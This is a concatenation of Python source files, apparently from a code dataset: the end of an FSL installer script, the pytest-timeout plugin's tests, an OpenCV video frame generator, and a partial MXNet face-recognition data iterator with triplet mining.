debug_group.add_option(
"-f", "--file", dest="archive",
help="Install a pre-downloaded copy of the FSL archive",
metavar="ARCHIVEFILE", action="store",
type="string")
debug_group.add_option(
"-C", "--checksum", dest="checksum",
help="Supply the expected checksum for the pre-downloaded FSL archive",
metavar="CHECKSUM", action="store",
type="string")
debug_group.add_option(
"-T", "--checksum-type", dest="checksum_type",
default="sha256",
help="Specify the type of checksum",
action="store",
type="string")
debug_group.add_option(
"-M", "--nochecksum", dest="skipchecksum",
help="Don't check the pre-downloaded FSL archive",
action="store_true")
debug_group.add_option(
"-D", dest="verbose",
help="Switch on debug messages",
action="store_true")
debug_group.add_option(
"-G", dest="test_installer",
help=SUPPRESS_HELP,
action="store",
type="string")
debug_group.add_option(
"-w", dest="test_csv",
help=SUPPRESS_HELP,
action="store_true"
)
parser.add_option_group(debug_group)
return parser.parse_args(args)
def override_host(requestbuild):
'''Overrides attributes of the Host class in the event that the user
has requested a specific FSL build.
'''
if requestbuild == 'centos7_64':
Host.o_s = 'linux'
Host.arch = 'x86_64'
Host.vendor = 'centos'
Host.version = Version('7.8.2003')
Host.glibc = '2.2.5'
Host.supported = True
Host.bits = '64'
elif requestbuild == 'centos6_64':
Host.o_s = 'linux'
Host.arch = 'x86_64'
Host.vendor = 'centos'
Host.version = Version('6.10')
Host.glibc = '2.2.5'
Host.supported = True
Host.bits = '64'
elif requestbuild == 'macOS_64':
Host.o_s = 'darwin'
Host.arch = 'x86_64'
Host.vendor = 'apple'
Host.version = Version('19.6.0')
Host.glibc = ''
Host.supported = True
Host.bits = '64'
# Download x86 version if running on Apple
# M1, as it runs just fine under emulation
elif (requestbuild is None and
Host.o_s == 'darwin' and
Host.arch == 'arm64'):
Host.arch = 'x86_64'
if __name__ == '__main__':
(options, args) = parse_options(sys.argv[1:])
if options.verbose:
MsgUser.debugOn()
print options
if options.quiet:
MsgUser.quietOn()
if options.test_csv:
HAS_JSON = False
override_host(options.requestbuild)
installer_settings = Settings()
try:
do_install(options, installer_settings)
except BadVersion, e:
MsgUser.debug(str(e))
MsgUser.failed("Unable to find requested version!")
sys.exit(1)
except (InstallError, GetFslDirError, GetInstalledVersionError), e:
MsgUser.failed(str(e))
sys.exit(1)
except UnsupportedOs, e:
MsgUser.failed(str(e))
sys.exit(1)
except KeyboardInterrupt, e:
MsgUser.message('')
MsgUser.failed("Install aborted.")
sys.exit(1)
|
test_pytest_timeout.py
|
import os.path
import signal
import sys
import time
import pexpect
import pytest
pytest_plugins = "pytester"
have_sigalrm = pytest.mark.skipif(
not hasattr(signal, "SIGALRM"), reason="OS does not have SIGALRM"
)
have_spawn = pytest.mark.skipif(
not hasattr(pexpect, "spawn"), reason="pexpect does not have spawn"
)
@pytest.fixture
def testdir(testdir):
if hasattr(testdir, "runpytest_subprocess"):
# on pytest-2.8 runpytest runs inline by default
# patch the testdir instance to use the subprocess method
testdir.runpytest = testdir.runpytest_subprocess
return testdir
def test_header(testdir):
testdir.makepyfile(
"""
def test_x(): pass
"""
)
result = testdir.runpytest("--timeout=1")
result.stdout.fnmatch_lines(
["timeout: 1.0s", "timeout method:*", "timeout func_only:*"]
)
@have_sigalrm
def test_sigalrm(testdir):
testdir.makepyfile(
"""
import time
def test_foo():
time.sleep(2)
"""
)
result = testdir.runpytest("--timeout=1")
result.stdout.fnmatch_lines(["*Failed: Timeout >1.0s*"])
def test_thread(testdir):
testdir.makepyfile(
"""
import time
def test_foo():
time.sleep(2)
"""
)
result = testdir.runpytest("--timeout=1", "--timeout-method=thread")
result.stderr.fnmatch_lines(
[
"*++ Timeout ++*",
"*~~ Stack of MainThread* ~~*",
"*File *, line *, in *",
"*++ Timeout ++*",
]
)
assert "++ Timeout ++" in result.stderr.lines[-1]
@pytest.mark.skipif(
hasattr(sys, "pypy_version_info"), reason="pypy coverage seems broken currently"
)
def test_cov(testdir):
# This test requires pytest-cov
pytest.importorskip("pytest_cov")
testdir.makepyfile(
"""
import time
def test_foo():
time.sleep(2)
"""
)
result = testdir.runpytest(
"--timeout=1", "--cov=test_cov", "--timeout-method=thread"
)
result.stderr.fnmatch_lines(
[
"*++ Timeout ++*",
"*~~ Stack of MainThread* ~~*",
"*File *, line *, in *",
"*++ Timeout ++*",
]
)
assert "++ Timeout ++" in result.stderr.lines[-1]
def test_timeout_env(testdir, monkeypatch):
testdir.makepyfile(
"""
import time
def test_foo():
time.sleep(2)
"""
)
monkeypatch.setitem(os.environ, "PYTEST_TIMEOUT", "1")
result = testdir.runpytest()
assert result.ret > 0
# @pytest.mark.parametrize('meth', [have_sigalrm('signal'), 'thread'])
# def test_func_fix(meth, testdir):
# testdir.makepyfile("""
# import time, pytest
# @pytest.fixture(scope='function')
# def fix():
# time.sleep(2)
# def test_foo(fix):
# pass
# """)
# result = testdir.runpytest('--timeout=1',
# '--timeout-method={0}'.format(meth))
# assert result.ret > 0
# assert 'Timeout' in result.stdout.str() + result.stderr.str()
@pytest.mark.parametrize("meth", [pytest.param("signal", marks=have_sigalrm), "thread"])
@pytest.mark.parametrize("scope", ["function", "class", "module", "session"])
def test_fix_setup(meth, scope, testdir):
testdir.makepyfile(
"""
import time, pytest
class TestFoo:
@pytest.fixture(scope='{scope}')
def fix(self):
time.sleep(2)
def test_foo(self, fix):
pass
""".format(
scope=scope
)
)
result = testdir.runpytest("--timeout=1", f"--timeout-method={meth}")
assert result.ret > 0
assert "Timeout" in result.stdout.str() + result.stderr.str()
def test_fix_setup_func_only(testdir):
testdir.makepyfile(
"""
import time, pytest
class TestFoo:
@pytest.fixture
def fix(self):
time.sleep(0.1)
@pytest.mark.timeout(func_only=True)
def test_foo(self, fix):
pass
"""
)
result = testdir.runpytest("--timeout=1")
assert result.ret == 0
assert "Timeout" not in result.stdout.str() + result.stderr.str()
@pytest.mark.parametrize("meth", [pytest.param("signal", marks=have_sigalrm), "thread"])
@pytest.mark.parametrize("scope", ["function", "class", "module", "session"])
def test_fix_finalizer(meth, scope, testdir):
testdir.makepyfile(
"""
import time, pytest
class TestFoo:
@pytest.fixture
def fix(self, request):
print('fix setup')
def fin():
print('fix finaliser')
time.sleep(2)
request.addfinalizer(fin)
def test_foo(self, fix):
pass
"""
)
result = testdir.runpytest("--timeout=1", "-s", f"--timeout-method={meth}")
assert result.ret > 0
assert "Timeout" in result.stdout.str() + result.stderr.str()
def test_fix_finalizer_func_only(testdir):
testdir.makepyfile(
"""
import time, pytest
class TestFoo:
@pytest.fixture
def fix(self, request):
print('fix setup')
def fin():
print('fix finaliser')
time.sleep(0.1)
request.addfinalizer(fin)
@pytest.mark.timeout(func_only=True)
def test_foo(self, fix):
pass
"""
)
result = testdir.runpytest("--timeout=1", "-s")
assert result.ret == 0
assert "Timeout" not in result.stdout.str() + result.stderr.str()
@have_sigalrm
def test_timeout_mark_sigalrm(testdir):
testdir.makepyfile(
"""
import time, pytest
@pytest.mark.timeout(1)
def test_foo():
time.sleep(2)
assert False
"""
)
result = testdir.runpytest()
result.stdout.fnmatch_lines(["*Failed: Timeout >1.0s*"])
def test_timeout_mark_timer(testdir):
testdir.makepyfile(
"""
import time, pytest
@pytest.mark.timeout(1)
def test_foo():
time.sleep(2)
"""
)
result = testdir.runpytest("--timeout-method=thread")
result.stderr.fnmatch_lines(["*++ Timeout ++*"])
def test_timeout_mark_non_int(testdir):
testdir.makepyfile(
"""
import time, pytest
@pytest.mark.timeout(0.01)
def test_foo():
time.sleep(1)
"""
)
result = testdir.runpytest("--timeout-method=thread")
result.stderr.fnmatch_lines(["*++ Timeout ++*"])
def test_timeout_mark_non_number(testdir):
testdir.makepyfile(
"""
import pytest
@pytest.mark.timeout('foo')
def test_foo():
pass
"""
)
result = testdir.runpytest()
result.stdout.fnmatch_lines(["*ValueError*"])
def test_timeout_mark_args(testdir):
testdir.makepyfile(
"""
import pytest
@pytest.mark.timeout(1, 2)
def test_foo():
pass
"""
)
result = testdir.runpytest()
result.stdout.fnmatch_lines(["*ValueError*"])
def test_timeout_mark_method_nokw(testdir):
testdir.makepyfile(
"""
import time, pytest
@pytest.mark.timeout(1, 'thread')
def test_foo():
time.sleep(2)
"""
)
result = testdir.runpytest()
result.stderr.fnmatch_lines(["*+ Timeout +*"])
def test_timeout_mark_noargs(testdir):
testdir.makepyfile(
"""
import pytest
@pytest.mark.timeout
def test_foo():
pass
"""
)
result = testdir.runpytest()
result.stdout.fnmatch_lines(["*TypeError*"])
def test_ini_timeout(testdir):
testdir.makepyfile(
"""
import time
def test_foo():
time.sleep(2)
"""
)
testdir.makeini(
"""
[pytest]
timeout = 1
"""
)
result = testdir.runpytest()
assert result.ret
def test_ini_timeout_func_only(testdir):
testdir.makepyfile(
"""
import time, pytest
@pytest.fixture
def slow():
time.sleep(2)
def test_foo(slow):
pass
"""
)
testdir.makeini(
"""
[pytest]
timeout = 1
timeout_func_only = true
"""
)
result = testdir.runpytest()
assert result.ret == 0
def test_ini_method(testdir):
testdir.makepyfile(
"""
import time
def test_foo():
time.sleep(2)
"""
)
testdir.makeini(
"""
[pytest]
timeout = 1
timeout_method = thread
"""
)
result = testdir.runpytest()
assert "=== 1 failed in " not in result.outlines[-1]
def test_timeout_marker_inheritance(testdir):
testdir.makepyfile(
"""
import time, pytest
@pytest.mark.timeout(timeout=2)
class TestFoo:
@pytest.mark.timeout(timeout=3)
def test_foo_2(self):
time.sleep(2)
def test_foo_1(self):
time.sleep(1)
"""
)
result = testdir.runpytest("--timeout=1", "-s")
assert result.ret == 0
assert "Timeout" not in result.stdout.str() + result.stderr.str()
def test_marker_help(testdir):
result = testdir.runpytest("--markers")
result.stdout.fnmatch_lines(["@pytest.mark.timeout(*"])
@pytest.mark.parametrize(
["debugging_module", "debugging_set_trace"],
[
("pdb", "set_trace()"),
pytest.param(
"ipdb",
"set_trace()",
marks=pytest.mark.xfail(
reason="waiting on https://github.com/pytest-dev/pytest/pull/7207"
" to allow proper testing"
),
),
pytest.param(
"pydevd",
"settrace(port=4678)",
marks=pytest.mark.xfail(reason="in need of way to setup pydevd server"),
),
],
)
@have_spawn
def test_suppresses_timeout_when_debugger_is_entered(
testdir, debugging_module, debugging_set_trace
):
p1 = testdir.makepyfile(
"""
import pytest, {debugging_module}
@pytest.mark.timeout(1)
def test_foo():
{debugging_module}.{debugging_set_trace}
""".format(
debugging_module=debugging_module, debugging_set_trace=debugging_set_trace
)
)
child = testdir.spawn_pytest(str(p1))
child.expect("test_foo")
time.sleep(0.2)
child.send("c\n")
child.sendeof()
result = child.read().decode().lower()
if child.isalive():
child.terminate(force=True)
assert "timeout >1.0s" not in result
assert "fail" not in result
def test_is_debugging(monkeypatch):
import pytest_timeout
assert not pytest_timeout.is_debugging()
# create a fake module named "custom.pydevd" with a trace function on it
from types import ModuleType
module_name = "custom.pydevd"
module = ModuleType(module_name)
monkeypatch.setitem(sys.modules, module_name, module)
def custom_trace(*args):
pass
custom_trace.__module__ = module_name
module.custom_trace = custom_trace
assert pytest_timeout.is_debugging(custom_trace)
def test_not_main_thread(testdir):
testdir.makepyfile(
"""
import threading
import pytest_timeout
current_timeout_setup = pytest_timeout.timeout_setup
def new_timeout_setup(item):
threading.Thread(
target=current_timeout_setup, args=(item),
).join()
pytest_timeout.timeout_setup = new_timeout_setup
def test_x(): pass
"""
)
result = testdir.runpytest("--timeout=1")
result.stdout.fnmatch_lines(
["timeout: 1.0s", "timeout method:*", "timeout func_only:*"]
)
|
video.py
|
import abc
import asyncio
import dataclasses
import multiprocessing
import os
import queue
import time
import typing
import cv2 # type: ignore
import dataclasses_json
from ffpyplayer.player import MediaPlayer # type: ignore
@dataclasses_json.dataclass_json(undefined='raise')
@dataclasses.dataclass(frozen=True)
class VideoInputConfig:
target_fps: float
@dataclasses_json.dataclass_json(undefined='raise')
@dataclasses.dataclass(frozen=True)
class FileInputConfig:
path: str
play_audio: bool
@dataclasses_json.dataclass_json(undefined='raise')
@dataclasses.dataclass(frozen=True)
class WebcamInputConfig:
device_id: int
@dataclasses.dataclass
class VideoFrame:
timestamp_s: float
video_data: typing.Any # TODO(TK): replace with np.typing.ArrayLike when numpy upgrades to 1.20+ (conditional on TensorFlow support)
class VideoFrameGenerator(abc.ABC):
def __init__(self, target_fps: float) -> None:
self._target_fps = target_fps
self._queue_live: queue.Queue[VideoFrame] = multiprocessing.Queue()
self._semaphore_live = multiprocessing.Semaphore(value=0)
self._queue_downsampled: queue.Queue[VideoFrame] = multiprocessing.Queue()
self._semaphore_downsampled = multiprocessing.Semaphore(value=0)
self._proc = multiprocessing.Process(target=self._gen)
def __enter__(self) -> 'VideoFrameGenerator':
return self
def __exit__(self, exc_type: typing.Any, exc_val: typing.Any, exc_tb: typing.Any) -> None:
return
def _gen(self) -> None:
raise NotImplementedError()
async def gen_async_live(self) -> typing.AsyncGenerator[VideoFrame, None]:
try:
if not self._proc.is_alive():
self._proc.start()
while self._proc.is_alive() or not self._queue_live.empty():
if not self._semaphore_live.acquire(block=False):
await asyncio.sleep(0)
continue
elem = self._queue_live.get()
yield elem
return
except asyncio.CancelledError:
pass
async def gen_async_downsampled(self) -> typing.AsyncGenerator[VideoFrame, None]:
try:
if not self._proc.is_alive():
self._proc.start()
while self._proc.is_alive() or not self._queue_live.empty():
if not self._semaphore_downsampled.acquire(block=False):
await asyncio.sleep(0)
continue
elem = self._queue_downsampled.get()
yield elem
return
except asyncio.CancelledError:
pass
class WebcamFrameGenerator(VideoFrameGenerator):
def __init__(self, target_fps: float, config: WebcamInputConfig) -> None:
super().__init__(target_fps=target_fps)
self._config = config
def _gen(self) -> None:
cap = cv2.VideoCapture(self._config.device_id) # noqa
if not cap.isOpened():
raise RuntimeError("Failed to open camera")
timestamp_initial: typing.Optional[float] = None
timestamp_target: typing.Optional[float] = None
while True:
ret, frame = cap.read()
timestamp = cap.get(cv2.CAP_PROP_POS_MSEC) / 1000.0
if timestamp_initial is None:
timestamp_initial = timestamp
if timestamp_target is None:
timestamp_target = timestamp
if ret:
video_frame = VideoFrame(timestamp_s=timestamp - timestamp_initial, video_data=frame)
self._queue_live.put(video_frame)
self._semaphore_live.release()
if timestamp >= timestamp_target:
timestamp_target += 1.0 / self._target_fps
self._queue_downsampled.put(video_frame)
self._semaphore_downsampled.release()
else:
cap.release()
return
class VideoFileFrameGenerator(VideoFrameGenerator):
def __init__(self, target_fps: float, config: FileInputConfig) -> None:
super().__init__(target_fps=target_fps)
self._config = config
if not os.path.exists(self._config.path):
raise FileNotFoundError(self._config.path)
def _gen(self) -> None:
if self._config.play_audio:
# we need to assign to a variable, even if unused, to prevent MediaPlayer from being GC'd
# TODO(TK): consider moving this to the audio file sensor
audio_player = MediaPlayer(self._config.path)
print("MediaPlayer (audio) loaded", flush=True)
else:
audio_player = None
cap = cv2.VideoCapture(self._config.path)
if not cap.isOpened():
raise RuntimeError("Failed to open video file!")
print("VideoCapture file loaded", flush=True)
timestamp_target: typing.Optional[float] = None
wallclock_begin = time.time()
timestamp_begin: typing.Optional[float] = None
while True:
# Retrieve a frame to precent garbage collection:
if audio_player is not None:
audio_player.get_frame(force_refresh=False, show=False)
ret, frame = cap.read()
timestamp_s = cap.get(cv2.CAP_PROP_POS_MSEC) / 1000.0 # noqa
if timestamp_begin is None:
timestamp_begin = timestamp_s
assert timestamp_begin == 0.0 # we can handle the case it isn't, but do expect it to be
if ret:
video_frame = VideoFrame(timestamp_s=timestamp_s - timestamp_begin, video_data=frame)
self._queue_live.put(video_frame)
self._semaphore_live.release()
# TODO(TK): Why do we get some timestamp_s=0 frames at the end?
if timestamp_target is None or timestamp_s >= timestamp_target:
timestamp_target = timestamp_target + 1.0 / self._target_fps if timestamp_target is not None else timestamp_s
self._queue_downsampled.put(video_frame)
self._semaphore_downsampled.release()
if timestamp_target is not None:
wallclock_elapsed = time.time() - wallclock_begin
video_elapsed = timestamp_s - timestamp_begin
wait_time = video_elapsed - wallclock_elapsed
if wait_time > 0:
time.sleep(wait_time)
else:
cap.release()
return
|
data.py
|
# THIS FILE IS FOR EXPERIMENTS, USE image_iter.py FOR NORMAL IMAGE LOADING.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import random
import logging
import sys
import numbers
import math
import sklearn
import datetime
import numpy as np
import cv2
import mxnet as mx
from mxnet import ndarray as nd
#from . import _ndarray_internal as _internal
#from mxnet._ndarray_internal import _cvimresize as imresize
#from ._ndarray_internal import _cvcopyMakeBorder as copyMakeBorder
from mxnet import io
from mxnet import recordio
sys.path.append(os.path.join(os.path.dirname(__file__), 'common'))
import face_preprocess
import multiprocessing
logger = logging.getLogger()
def pick_triplets_impl(q_in, q_out):
more = True
while more:
deq = q_in.get()
if deq is None:
more = False
else:
embeddings, emb_start_idx, nrof_images, alpha = deq
print('running', emb_start_idx, nrof_images, os.getpid())
for j in xrange(1,nrof_images):
a_idx = emb_start_idx + j - 1
neg_dists_sqr = np.sum(np.square(embeddings[a_idx] - embeddings), 1)
for pair in xrange(j, nrof_images): # For every possible positive pair.
p_idx = emb_start_idx + pair
pos_dist_sqr = np.sum(np.square(embeddings[a_idx]-embeddings[p_idx]))
neg_dists_sqr[emb_start_idx:emb_start_idx+nrof_images] = np.NaN
all_neg = np.where(np.logical_and(neg_dists_sqr-pos_dist_sqr<alpha, pos_dist_sqr<neg_dists_sqr))[0] # FaceNet selection
#all_neg = np.where(neg_dists_sqr-pos_dist_sqr<alpha)[0] # VGG Face selecction
nrof_random_negs = all_neg.shape[0]
if nrof_random_negs>0:
rnd_idx = np.random.randint(nrof_random_negs)
n_idx = all_neg[rnd_idx]
#triplets.append( (a_idx, p_idx, n_idx) )
q_out.put( (a_idx, p_idx, n_idx) )
#emb_start_idx += nrof_images
print('exit',os.getpid())
class FaceImageIter(io.DataIter):
def __init__(self, batch_size, data_shape,
path_imgrec = None,
shuffle=False, aug_list=None, mean = None,
rand_mirror = False, cutoff = 0,
c2c_threshold = 0.0, output_c2c = 0, c2c_mode = -10, limit = 0,
ctx_num = 0, images_per_identity = 0, data_extra = None, hard_mining = False,
triplet_params = None, coco_mode = False,
mx_model = None,
data_name='data', label_name='softmax_label', **kwargs):
super(FaceImageIter, self).__init__()
assert path_imgrec
if path_imgrec:
logging.info('loading recordio %s...',
path_imgrec)
path_imgidx = path_imgrec[0:-4]+".idx"
self.imgrec = recordio.MXIndexedRecordIO(path_imgidx, path_imgrec, 'r') # pylint: disable=redefined-variable-type
s = self.imgrec.read_idx(0)
header, _ = recordio.unpack(s)
self.idx2cos = {}
self.idx2flag = {}
self.idx2meancos = {}
self.c2c_auto = False
#if output_c2c or c2c_threshold>0.0 or c2c_mode>=-5:
# path_c2c = os.path.join(os.path.dirname(path_imgrec), 'c2c')
# print(path_c2c)
# if os.path.exists(path_c2c):
# for line in open(path_c2c, 'r'):
# vec = line.strip().split(',')
# idx = int(vec[0])
# self.idx2cos[idx] = float(vec[1])
# self.idx2flag[idx] = 1
# if len(vec)>2:
# self.idx2flag[idx] = int(vec[2])
# else:
# self.c2c_auto = True
# self.c2c_step = 10000
if header.flag>0:
print('header0 label', header.label)
self.header0 = (int(header.label[0]), int(header.label[1]))
#assert(header.flag==1)
self.imgidx = range(1, int(header.label[0]))
if c2c_mode==0:
imgidx2 = []
for idx in self.imgidx:
c = self.idx2cos[idx]
f = self.idx2flag[idx]
if f!=1:
continue
imgidx2.append(idx)
print('idx count', len(self.imgidx), len(imgidx2))
self.imgidx = imgidx2
elif c2c_mode==1:
imgidx2 = []
tmp = []
for idx in self.imgidx:
c = self.idx2cos[idx]
f = self.idx2flag[idx]
if f==1:
imgidx2.append(idx)
else:
tmp.append( (idx, c) )
tmp = sorted(tmp, key = lambda x:x[1])
tmp = tmp[250000:300000]
for _t in tmp:
imgidx2.append(_t[0])
print('idx count', len(self.imgidx), len(imgidx2))
self.imgidx = imgidx2
elif c2c_mode==2:
imgidx2 = []
tmp = []
for idx in self.imgidx:
c = self.idx2cos[idx]
f = self.idx2flag[idx]
if f==1:
imgidx2.append(idx)
else:
tmp.append( (idx, c) )
tmp = sorted(tmp, key = lambda x:x[1])
tmp = tmp[200000:300000]
for _t in tmp:
imgidx2.append(_t[0])
print('idx count', len(self.imgidx), len(imgidx2))
self.imgidx = imgidx2
elif c2c_mode==-2:
imgidx2 = []
for idx in self.imgidx:
c = self.idx2cos[idx]
f = self.idx2flag[idx]
if f==2:
continue
if c<0.73:
continue
imgidx2.append(idx)
print('idx count', len(self.imgidx), len(imgidx2))
self.imgidx = imgidx2
elif c2c_threshold>0.0:
imgidx2 = []
for idx in self.imgidx:
c = self.idx2cos[idx]
f = self.idx2flag[idx]
if c<c2c_threshold:
continue
imgidx2.append(idx)
print(len(self.imgidx), len(imgidx2))
self.imgidx = imgidx2
self.id2range = {}
self.seq_identity = range(int(header.label[0]), int(header.label[1]))
c2c_stat = [0,0]
for identity in self.seq_identity:
s = self.imgrec.read_idx(identity)
header, _ = recordio.unpack(s)
a,b = int(header.label[0]), int(header.label[1])
self.id2range[identity] = (a,b)
count = b-a
if count>=output_c2c:
c2c_stat[1]+=1
else:
c2c_stat[0]+=1
for ii in xrange(a,b):
self.idx2flag[ii] = count
if len(self.idx2cos)>0:
m = 0.0
for ii in xrange(a,b):
m+=self.idx2cos[ii]
m/=(b-a)
for ii in xrange(a,b):
self.idx2meancos[ii] = m
#self.idx2meancos[identity] = m
print('id2range', len(self.id2range))
print(len(self.idx2cos), len(self.idx2meancos), len(self.idx2flag))
print('c2c_stat', c2c_stat)
if limit>0 and limit<len(self.imgidx):
random.seed(727)
prob = float(limit)/len(self.imgidx)
new_imgidx = []
new_ids = 0
for identity in self.seq_identity:
s = self.imgrec.read_idx(identity)
header, _ = recordio.unpack(s)
a,b = int(header.label[0]), int(header.label[1])
found = False
for _idx in xrange(a,b):
if random.random()<prob:
found = True
new_imgidx.append(_idx)
if found:
new_ids+=1
self.imgidx = new_imgidx
print('new ids', new_ids)
random.seed(None)
#random.Random(727).shuffle(self.imgidx)
#self.imgidx = self.imgidx[0:limit]
else:
self.imgidx = list(self.imgrec.keys)
if shuffle:
self.seq = self.imgidx
self.oseq = self.imgidx
print(len(self.seq))
else:
self.seq = None
self.mean = mean
self.nd_mean = None
if self.mean:
self.mean = np.array(self.mean, dtype=np.float32).reshape(1,1,3)
self.nd_mean = mx.nd.array(self.mean).reshape((1,1,3))
self.check_data_shape(data_shape)
self.provide_data = [(data_name, (batch_size,) + data_shape)]
self.batch_size = batch_size
self.data_shape = data_shape
self.shuffle = shuffle
self.image_size = '%d,%d'%(data_shape[1],data_shape[2])
self.rand_mirror = rand_mirror
print('rand_mirror', rand_mirror)
self.cutoff = cutoff
#self.cast_aug = mx.image.CastAug()
#self.color_aug = mx.image.ColorJitterAug(0.4, 0.4, 0.4)
self.ctx_num = ctx_num
self.c2c_threshold = c2c_threshold
self.output_c2c = output_c2c
self.per_batch_size = int(self.batch_size/self.ctx_num)
self.images_per_identity = images_per_identity
if self.images_per_identity>0:
self.identities = int(self.per_batch_size/self.images_per_identity)
self.per_identities = self.identities
self.repeat = 3000000.0/(self.images_per_identity*len(self.id2range))
self.repeat = int(self.repeat)
print(self.images_per_identity, self.identities, self.repeat)
self.data_extra = None
if data_extra is not None:
self.data_extra = nd.array(data_extra)
self.provide_data = [(data_name, (batch_size,) + data_shape), ('extra', data_extra.shape)]
self.hard_mining = hard_mining
self.mx_model = mx_model
if self.hard_mining:
assert self.images_per_identity>0
assert self.mx_model is not None
self.triplet_params = triplet_params
self.triplet_mode = False
self.coco_mode = coco_mode
if len(label_name)>0:
if output_c2c:
self.provide_label = [(label_name, (batch_size,2))]
else:
self.provide_label = [(label_name, (batch_size,))]
else:
self.provide_label = []
#print(self.provide_label[0][1])
if self.coco_mode:
assert self.triplet_params is None
assert self.images_per_identity>0
if self.triplet_params is not None:
assert self.images_per_identity>0
assert self.mx_model is not None
self.triplet_bag_size = self.triplet_params[0]
self.triplet_alpha = self.triplet_params[1]
self.triplet_max_ap = self.triplet_params[2]
assert self.triplet_bag_size>0
assert self.triplet_alpha>=0.0
assert self.triplet_alpha<=1.0
self.triplet_mode = True
self.triplet_oseq_cur = 0
self.triplet_oseq_reset()
self.seq_min_size = self.batch_size*2
self.cur = 0
self.nbatch = 0
self.is_init = False
self.times = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
#self.reset()
def ____pick_triplets(self, embeddings, nrof_images_per_class):
emb_start_idx = 0
people_per_batch = len(nrof_images_per_class)
nrof_threads = 8
q_in = multiprocessing.Queue()
q_out = multiprocessing.Queue()
processes = [multiprocessing.Process(target=pick_triplets_impl, args=(q_in, q_out)) \
for i in range(nrof_threads)]
for p in processes:
p.start()
# VGG Face: Choosing good triplets is crucial and should strike a balance between
# selecting informative (i.e. challenging) examples and swamping training with examples that
# are too hard. This is achieve by extending each pair (a, p) to a triplet (a, p, n) by sampling
# the image n at random, but only between the ones that violate the triplet loss margin. The
# latter is a form of hard-negative mining, but it is not as aggressive (and much cheaper) than
# choosing the maximally violating example, as often done in structured output learning.
for i in xrange(people_per_batch):
nrof_images = int(nrof_images_per_class[i])
job = (embeddings, emb_start_idx, nrof_images, self.triplet_alpha)
emb_start_idx+=nrof_images
q_in.put(job)
for i in xrange(nrof_threads):
q_in.put(None)
print('joining')
for p in processes:
p.join()
print('joined')
q_out.put(None)
triplets = []
more = True
while more:
triplet = q_out.get()
if triplet is None:
more = False
else:
triplets.append(triplets)
np.random.shuffle(triplets)
return triplets
#cal pairwise dists on single gpu
def _pairwise_dists(self, embeddings):
nd_embedding = mx.nd.array(embeddings, mx.gpu(0))
pdists = []
for idx in xrange(embeddings.shape[0]):
a_embedding = nd_embedding[idx]
body = mx.nd.broadcast_sub(a_embedding, nd_embedding)
body = body*body
body = mx.nd.sum_axis(body, axis=1)
ret = body.asnumpy()
#print(ret.shape)
pdists.append(ret)
return pdists
def pairwise_dists(self, embeddings):
nd_embedding_list = []
for i in xrange(self.ctx_num):
nd_embedding = mx.nd.array(embeddings, mx.gpu(i))
nd_embedding_list.append(nd_embedding)
nd_pdists = []
pdists = []
for idx in xrange(embeddings.shape[0]):
emb_idx = idx%self.ctx_num
nd_embedding = nd_embedding_list[emb_idx]
a_embedding = nd_embedding[idx]
body = mx.nd.broadcast_sub(a_embedding, nd_embedding)
body = body*body
body = mx.nd.sum_axis(body, axis=1)
nd_pdists.append(body)
if len(nd_pdists)==self.ctx_num or idx==embeddings.shape[0]-1:
for x in nd_pdists:
pdists.append(x.asnumpy())
nd_pdists = []
return pdists
def pick_triplets(self, embeddings, nrof_images_per_class):
emb_start_idx = 0
triplets = []
people_per_batch = len(nrof_images_per_class)
#self.time_reset()
pdists = self.pairwise_dists(embeddings)
#self.times[3] += self.time_elapsed()
for i in xrange(people_per_batch):
nrof_images = int(nrof_images_per_class[i])
for j in xrange(1,nrof_images):
#self.time_reset()
a_idx = emb_start_idx + j - 1
#neg_dists_sqr = np.sum(np.square(embeddings[a_idx] - embeddings), 1)
neg_dists_sqr = pdists[a_idx]
#self.times[3] += self.time_elapsed()
for pair in xrange(j, nrof_images): # For every possible positive pair.
p_idx = emb_start_idx + pair
#self.time_reset()
pos_dist_sqr = np.sum(np.square(embeddings[a_idx]-embeddings[p_idx]))
#self.times[4] += self.time_elapsed()
#self.time_reset()
neg_dists_sqr[emb_start_idx:emb_start_idx+nrof_images] = np.NaN
if self.triplet_max_ap>0.0:
if pos_dist_sqr>self.triplet_max_ap:
continue
all_neg = np.where(np.logical_and(neg_dists_sqr-pos_dist_sqr<self.triplet_alpha, pos_dist_sqr<neg_dists_sqr))[0] # FaceNet selection
#self.times[5] += self.time_elapsed()
#self.time_reset()
#all_neg = np.where(neg_dists_sqr-pos_dist_sqr<alpha)[0] # VGG Face selecction
nrof_random_negs = all_neg.shape[0]
if nrof_random_negs>0:
rnd_idx = np.random.randint(nrof_random_negs)
n_idx = all_neg[rnd_idx]
triplets.append( (a_idx, p_idx, n_idx) )
emb_start_idx += nrof_images
np.random.shuffle(triplets)
return triplets
def __pick_triplets(self, embeddings, nrof_images_per_class):
emb_start_idx = 0
triplets = []
people_per_batch = len(nrof_images_per_class)
for i in xrange(people_per_batch):
nrof_images = int(nrof_images_per_class[i])
if nrof_images<2:
continue
for j in xrange(1,nrof_images):
a_idx = emb_start_idx + j - 1
pcount = nrof_images-1
dists_a2all = np.sum(np.square(embeddings[a_idx] - embeddings), 1) #(N,)
#print(a_idx, dists_a2all.shape)
ba = emb_start_idx
bb = emb_start_idx+nrof_images
sorted_idx = np.argsort(dists_a2all)
#print('assert', sorted_idx[0], a_idx)
#assert sorted_idx[0]==a_idx
#for idx in sorted_idx:
# print(idx, dists_a2all[idx])
p2n_map = {}
pfound = 0
for idx in sorted_idx:
if idx==a_idx: #is anchor
continue
if idx<bb and idx>=ba: #is pos
p2n_map[idx] = [dists_a2all[idx], []] #ap, [neg_list]
pfound+=1
else: # is neg
an = dists_a2all[idx]
if pfound==pcount and len(p2n_map)==0:
break
to_del = []
for p_idx in p2n_map:
v = p2n_map[p_idx]
an_ap = an - v[0]
if an_ap<self.triplet_alpha:
v[1].append(idx)
else:
#output
if len(v[1])>0:
n_idx = random.choice(v[1])
triplets.append( (a_idx, p_idx, n_idx) )
to_del.append(p_idx)
for _del in to_del:
del p2n_map[_del]
for p_idx,v in p2n_map.iteritems():
if len(v[1])>0:
n_idx = random.choice(v[1])
triplets.append( (a_idx, p_idx, n_idx) )
emb_start_idx += nrof_images
np.random.shuffle(triplets)
return triplets
def triplet_oseq_reset(self):
#reset self.oseq by identities seq
self.triplet_oseq_cur = 0
ids = []
for k in self.id2range:
ids.append(k)
random.shuffle(ids)
self.oseq = []
for _id in ids:
v = self.id2range[_id]
_list = range(*v)
random.shuffle(_list)
if len(_list)>self.images_per_identity:
